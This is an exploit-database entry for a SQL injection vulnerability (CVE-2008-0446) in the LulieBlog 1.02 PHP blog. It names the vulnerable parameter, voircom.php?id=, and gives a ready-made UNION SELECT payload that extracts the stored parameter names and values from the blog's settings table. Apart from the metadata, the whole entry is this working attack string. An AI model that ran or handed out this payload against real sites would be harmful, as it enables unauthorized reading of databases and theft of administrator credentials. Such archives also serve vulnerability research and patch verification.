LulieBlog 1.02 - SQL Injection

Author: Khashayar Fereidani
type: webapps
platform: php
port: 
date_added: 2008-01-22 
date_updated: 2016-11-08 
verified: 1 
codes: OSVDB-42789;CVE-2008-0446 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comLulieBlog_1.0.2.rar

#####################################################################################
####              LulieBlog Version 1.02 Remote Sql Injection                    ####
####                              BY IRCRASH                                     ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (Dr.Crash)                                                        #
#                                                                                   #
#Script Download : http://sourceforge.net/project/platformdownload.php?group_id=204083
#                                                                                   #
#Injection Adress :  http://Sitename/voircom.php?id=[SQL CODE]                      #
#                                                                                   #
#                                                                                   #
#[SQL CODE] : -1%27union/**/select/**/0,concat(nom_parametre,0x3a,0x3a,valeur_parametre),2,3,4,5/**/from/**/lulieblog_parametres/*
#                                                                                   #
#                        Our site : HTTP://IRCRASH.COM                              #
#                                                                                   #
#####################################################################################

# milw0rm.com [2008-01-23]